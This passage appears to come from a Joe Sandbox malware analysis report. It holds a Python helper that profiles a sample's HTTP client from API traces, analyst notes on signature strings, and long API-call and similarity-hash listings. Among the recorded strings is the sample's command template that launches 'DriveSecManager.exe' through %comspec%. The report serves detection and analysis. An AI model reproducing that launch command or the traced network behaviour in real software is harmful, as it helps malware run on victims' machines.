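    return [name for bit, name in sorted(table.items()) if value & bit]


def http_profile(calls):
    """Summarise the HTTP client: verb, user agent, decoded flags, chain order."""
    prof = {}
    order = [c.api for c in calls if not c.subcall]
    pos, complete = -1, True
    for api in HTTP_CHAIN:  # each stage must follow the previous one
        try:
            pos = order.index(api, pos + 1)
        except ValueError:
            complete = False
            break
    prof["chain_complete"] = complete
    for c in calls:
        if c.api == "InternetOpenA" and len(c.args) >= 2:
            prof["user_agent"] = c.args[0]
            prof["access_type"] = OPEN_TYPE.get(_hex(c.args[1]), c.args[1])
        elif c.api == "InternetConnectA" and len(c.args) >= 6:
            prof["service"] = SERVICE.get(_hex(c.args[5]), c.args[5])
        elif c.api == "HttpOpenRequestA" and len(c.args) >= 2:
            prof["verb"] = c.args[1]
        elif c.api == "HttpAddRequestHeadersA" and len(c.args) >= 4:
            v = _hex(c.args[3])
            prof["header_flags"] = _flags(v, ADDREQ_FLAGS) if v is not None else []
        elif c.api == "InternetCrackUrlA" and len(c.args) >= 3:
            v = _hex(c.args[2])
            prof["crack_flags"] = _flags(v, CRACK_FLAGS) if v is not None else []
        elif c.api == "InternetReadFile" and len(c.args) >= 3:
            prof["read_chunk"] = _hex(c.args[2])
    return prof


if __name__ == "__main__":
    for key, value in http_profile(parse_apis(SAMPLE)).items():
        print(f"{key:15} {value}")
```

                                                                    For this entry the profile comes out as a direct (no proxy) HTTP POST with the agent string "Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)", headers added with HTTP_ADDREQ_FLAG_ADD | HTTP_ADDREQ_FLAG_REPLACE (0xA0000000), URLs cracked with ICU_DECODE and the response read in 0x400-byte chunks. Pasting in the GET routine recorded further down the page gives the same complete chain with verb GET, a NULL (00000000) agent and no header flags, which is the quickest way to confirm the two routines are one client with two verbs. The UPnP user agent, the POST verb and the device/deviceType and service/serviceType comparisons in the entries that follow are the strings to pivot on for a network or memory signature.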
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                    • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                    • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                    • String ID: PCOI$ilci$.Mw
                                                                    • API String ID: 2403999931-2607080227
                                                                    • Opcode ID: 002568448c63d0a3f212006a3792e32a6b926d0b6d38af1dbe87adf1abbded14
                                                                    • Instruction ID: 0b50c8f8eba6d918d1ff78dc69fee2fe4193f5a447302b2e0c9d98a55ef35816
                                                                    • Opcode Fuzzy Hash: 002568448c63d0a3f212006a3792e32a6b926d0b6d38af1dbe87adf1abbded14
                                                                    • Instruction Fuzzy Hash: 6731A671900705ABC710AF70EC48B97B7B8BF09300F048A3EE559A7690D779F894CB98
                                                                    APIs
                                                                    • memset.NTDLL ref: 0040DBE8
                                                                    • InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040DD7A
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDC4
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDD1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                    • String ID: <$GET
                                                                    • API String ID: 1205665004-427699995
                                                                    • Opcode ID: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                    • Instruction ID: 2be109b622ab9a99a7f53353d246b615867c30bbfdc4ae23a93fa512118ea852
                                                                    • Opcode Fuzzy Hash: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                    • Instruction Fuzzy Hash: CA511CB5D01228ABDB36CB50CC55BE9B7BCAB44705F0480E9E60DAA2C0D7B96BC4CF54
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                    • setsockopt.WS2_32 ref: 00401F2C
                                                                    • closesocket.WS2_32(?), ref: 00401F39
                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                    • String ID:
                                                                    • API String ID: 671207744-0
                                                                    • Opcode ID: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                    • Instruction ID: a48952fab395babe4cfd63b323185ec8fb23c48b53ef468cda2161a158f186bf
                                                                    • Opcode Fuzzy Hash: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                    • Instruction Fuzzy Hash: 7A51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: device$deviceType
                                                                    • API String ID: 1602765415-3511266565
                                                                    • Opcode ID: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                    • Instruction ID: d9bf12878483276118e69e011fb1eaaed98ea0d23904e8601ea4f62f39df24ad
                                                                    • Opcode Fuzzy Hash: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                    • Instruction Fuzzy Hash: C4412D74A0020ADFCB04DF95C884FAFBBB5BF49304F108969E915A7390D778AD81CB95
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: service$serviceType
                                                                    • API String ID: 1602765415-3667235276
                                                                    • Opcode ID: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                    • Instruction ID: 8be64e74ab35422ce5b67f5b255e261f781d2e412f5a45cda6e842047ddde31e
                                                                    • Opcode Fuzzy Hash: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                    • Instruction Fuzzy Hash: BB41E874A0020ADFCB14CF99C884BAFB7B9BF48304F1085ADE515A7390D778AA81CF95
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3168844106-0
                                                                    • Opcode ID: 84994d564abaa1f0b77106ae7f883709b87c3a35ff6a80d81c042e6f665fff2e
                                                                    • Instruction ID: 16d4c05c25790a512fd8f3a1e6e85bd280fefa1845e4e3e4af960acff63a7a98
                                                                    • Opcode Fuzzy Hash: 84994d564abaa1f0b77106ae7f883709b87c3a35ff6a80d81c042e6f665fff2e
                                                                    • Instruction Fuzzy Hash: DE31D1722012059FC310AFB5FD8CAD7B7A8FF44324F04863EE559D3280D778A4449BA9
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: device$deviceType
                                                                    • API String ID: 1602765415-3511266565
                                                                    • Opcode ID: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                    • Instruction ID: b41677b7307b510c0c46b42eeb4edde7184acd44519d028b9e49cf38c7e22350
                                                                    • Opcode Fuzzy Hash: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                    • Instruction Fuzzy Hash: 24310C74A0020ADFCB14DF95C884FAFBBB5BF88304F108969E915B7390D778A981CB95
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
Similarity
• API ID: FreeStringlstrcmpi
• String ID: service$serviceType
• API String ID: 1602765415-3667235276
APIs
Similarity
• API ID: _allshl_aullshr
• String ID:
• API String ID: 673498613-0
APIs
• CoInitialize.OLE32(00000000), ref: 0040646B
• CoCreateInstance.OLE32(00412438,00000000,00000001,00412418,?), ref: 00406483
• wsprintfW.USER32 ref: 004064B6
Strings
• /c start %s & start %s\DriveSecManager.exe, xrefs: 004064AA
• %comspec%, xrefs: 004064BF
Similarity
• API ID: CreateInitializeInstancewsprintf
• String ID: %comspec%$/c start %s & start %s\DriveSecManager.exe
• API String ID: 2038452267-3640840557
APIs
• EnterCriticalSection.KERNEL32(020D0634), ref: 0040D429
• CloseHandle.KERNEL32(020D0638), ref: 0040D458
• LeaveCriticalSection.KERNEL32(020D0634), ref: 0040D467
• DeleteCriticalSection.KERNEL32(020D0634), ref: 0040D474
Strings
Similarity
• API ID: CriticalSection$CloseDeleteEnterHandleLeave
• String ID: .Mw
• API String ID: 3102160386-2453323595
APIs
• SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
• WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
• CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
  • Part of subcall function 0040A1B0: RtlFreeHeap.NTDLL(020D0000,00000000,00402612,?,00402612,?), ref: 0040A20B
Strings
Similarity
• API ID: CloseEventFreeHandleHeapObjectSingleWait
• String ID: pdu$.Mw
• API String ID: 309973729-3908477397
APIs
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
• InterlockedDecrement.KERNEL32(?), ref: 004018B1
  • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
  • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
  • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
Similarity
• API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
• String ID:
• API String ID: 3966618661-0
APIs
Similarity
• API ID: _allshl
• String ID:
• API String ID: 435966717-0
APIs
• GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
• WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
• WSAGetLastError.WS2_32 ref: 00401FB9
• GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
Similarity
• API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
• String ID:
• API String ID: 2074799992-0
APIs
• WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
• WSAGetLastError.WS2_32(?,?,?,00401FD3,00000000), ref: 00401C90
• Sleep.KERNEL32(00000001,?,?,?,00401FD3,00000000), ref: 00401CA6
• WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
Similarity
• API ID: Recv$ErrorLastSleep
• String ID:
• API String ID: 3668019968-0
APIs
• WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
• WSAGetLastError.WS2_32 ref: 00401B12
• Sleep.KERNEL32(00000001), ref: 00401B28
• WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
Similarity
• API ID: Send$ErrorLastSleep
• String ID:
• API String ID: 2121970615-0
APIs
• EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
• LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
• LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
APIs
  • Part of subcall function 0040DBC0: memset.NTDLL ref: 0040DBE8
  • Part of subcall function 0040DBC0: InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
  • Part of subcall function 0040DBC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
  • Part of subcall function 0040DBC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
  • Part of subcall function 0040DBC0: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
  • Part of subcall function 0040DBC0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
  • Part of subcall function 0040DBC0: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
  • Part of subcall function 0040DBC0: InternetCloseHandle.WININET(00000000), ref: 0040DDB7
  • Part of subcall function 0040DAB0: SysAllocString.OLEAUT32(00000000), ref: 0040DADE
  • Part of subcall function 0040DAB0: CoCreateInstance.OLE32(00412408,00000000,00004401,004123F8,00000000), ref: 0040DB06
  • Part of subcall function 0040DAB0: SysFreeString.OLEAUT32(00000000), ref: 0040DBA1
• SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
• SysFreeString.OLEAUT32(00000000), ref: 0040DA65
Strings
                                                                    Similarity
                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                    • String ID: %S%S
                                                                    • API String ID: 1017111014-3267608656
                                                                    • Opcode ID: 90752405ea59c0d94f47ff5784e28f2eddf96679eb43bf22d5b787ed4233eba5
                                                                    • Instruction ID: beec9ad9f3848cf7af9d47610756df11a49d132dd1bd9a4578eda8885410465d
                                                                    • Opcode Fuzzy Hash: 90752405ea59c0d94f47ff5784e28f2eddf96679eb43bf22d5b787ed4233eba5
                                                                    • Instruction Fuzzy Hash: 4941E6B5E002099FCB04DBE4C885AEFB7B9BF48304F148569E505B7391D738AA85CFA5
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                    • CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleObjectSingleWait
                                                                    • String ID: .Mw
                                                                    • API String ID: 528846559-2453323595
                                                                    • Opcode ID: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                    • Instruction ID: d1fe1851c25795fdacbee2e877de448503af208f5fff4c31293181607202da8f
                                                                    • Opcode Fuzzy Hash: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                    • Instruction Fuzzy Hash: 3B11C574A04208EFCB04CF84D580E69B7B6FB89354F2081AAEC05AB385C735EE52DB95

                                                                    Execution Graph

                                                                    Execution Coverage:22.5%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:13
                                                                    Total number of Limit Nodes:1

                                                                    Callgraph

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1644008324.00007FF7BFFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7bffe0000_240016073.jbxd
                                                                    Similarity
                                                                    • API ID: InformationQuerySystem
                                                                    • String ID:
                                                                    • API String ID: 3562636166-0
                                                                    • Opcode ID: 08acd1e83d3bf0b71ee43c32630c4936db73b5807665742727b27dcd7e90fba9
                                                                    • Instruction ID: e31875e708f161b2194610f64b2e3e9236c41e1ea3b7b02b07eda57861b0e68b
                                                                    • Opcode Fuzzy Hash: 08acd1e83d3bf0b71ee43c32630c4936db73b5807665742727b27dcd7e90fba9
                                                                    • Instruction Fuzzy Hash: 8F31E571A0CA4C8FDB18DF9CE8456F9BBE1EBA5321F10423FD049D3651DB7068468B91

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1644008324.00007FF7BFFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7bffe0000_240016073.jbxd
                                                                    Similarity
                                                                    • API ID: InformationQuerySystem
                                                                    • String ID:
                                                                    • API String ID: 3562636166-0
                                                                    • Opcode ID: 893ceccecf04489e0994deebe1d34cde7f6d88148e52aaddece88e1072b36ae3
                                                                    • Instruction ID: a58f62a1a7436c04b9e9e0c2d4f4aa98c139b2d90b02b6414b3a0e1a22c6e78e
                                                                    • Opcode Fuzzy Hash: 893ceccecf04489e0994deebe1d34cde7f6d88148e52aaddece88e1072b36ae3
                                                                    • Instruction Fuzzy Hash: BA31047090CB889FDB18DB9CD8456F9BBE1EBA6321F00426FD049C3252CB606802CB81

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 14 7ff7bffe0690-7ff7bffe0fdf NtQuerySystemInformation 19 7ff7bffe0fe1 14->19 20 7ff7bffe0fe7-7ff7bffe1004 14->20 19->20
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1644008324.00007FF7BFFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7bffe0000_240016073.jbxd
                                                                    Similarity
                                                                    • API ID: InformationQuerySystem
                                                                    • String ID:
                                                                    • API String ID: 3562636166-0
                                                                    • Opcode ID: 2e8da30ba0e61fb69efc55d4ccc8ca070d57be4352fbc521421ed13c035e4bab
                                                                    • Instruction ID: d77628adb49f9d95b9534f85ff1f26bb762f50e46eafd57a2f7a475392b7855c
                                                                    • Opcode Fuzzy Hash: 2e8da30ba0e61fb69efc55d4ccc8ca070d57be4352fbc521421ed13c035e4bab
                                                                    • Instruction Fuzzy Hash: 7B31C67191CA4C8FDB18EB9CA8456F9BBE1EB65321F10423FD049D3651DB7068528791

                                                                    Execution Graph

                                                                    Execution Coverage:0.1%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:1436
                                                                    Total number of Limit Nodes:1
socket 5122->5123 5124 40aa59 gethostbyname 5122->5124 5123->4979 5123->4980 5124->5123 5125->4979 5126->4986 5128 40e4c7 5127->5128 5129 40e594 InternetConnectA 5127->5129 5128->4992 5128->4993 5130 40e714 InternetCloseHandle 5129->5130 5131 40e5cd HttpOpenRequestA 5129->5131 5130->5128 5132 40e603 HttpAddRequestHeadersA HttpSendRequestA 5131->5132 5133 40e707 InternetCloseHandle 5131->5133 5134 40e6fa InternetCloseHandle 5132->5134 5137 40e64d 5132->5137 5133->5130 5134->5133 5135 40e664 InternetReadFile 5136 40e691 5135->5136 5135->5137 5136->5134 5137->5135 5137->5136 5138 409fe0 9 API calls 5137->5138 5139 40e6ac memcpy 5138->5139 5139->5137 5145 407067 5140->5145 5141 40723b 5143 407244 SysFreeString 5141->5143 5144 40700b SysFreeString 5141->5144 5142 40a1b0 _invalid_parameter 3 API calls 5142->5141 5143->5144 5144->4448 5146 4072c0 CoCreateInstance 5145->5146 5147 4071b6 SysAllocString 5145->5147 5148 407082 5145->5148 5146->5145 5147->5145 5147->5148 5148->5141 5148->5142 5150 40beca 5149->5150 5151 40bece 5149->5151 5150->4454 5153 40be80 CryptAcquireContextW 5151->5153 5154 40bebb 5153->5154 5155 40be9d CryptGenRandom CryptReleaseContext 5153->5155 5154->5150 5155->5154 5156->4477 5208 40add0 gethostname 5157->5208 5160 40aeb9 5160->4477 5162 40aecc strcmp 5162->5160 5163 40aee1 5162->5163 5212 40aa20 inet_ntoa 5163->5212 5165 40aeef strstr 5166 40af40 5165->5166 5167 40aeff 5165->5167 5215 40aa20 inet_ntoa 5166->5215 5213 40aa20 inet_ntoa 5167->5213 5170 40af0d strstr 5170->5160 5172 40af1d 5170->5172 5171 40af4e strstr 5173 40af5e 5171->5173 5174 40af9f 5171->5174 5214 40aa20 inet_ntoa 5172->5214 5216 40aa20 inet_ntoa 5173->5216 5218 40aa20 inet_ntoa 5174->5218 5178 40af6c strstr 5178->5160 5181 40af7c 5178->5181 5179 40afad strstr 5182 40afbd 5179->5182 5183 40affe EnterCriticalSection 5179->5183 5180 40af2b strstr 5180->5160 5180->5166 5217 40aa20 inet_ntoa 5181->5217 5219 40aa20 inet_ntoa 5182->5219 5184 40b016 5183->5184 5193 40b041 5184->5193 5221 
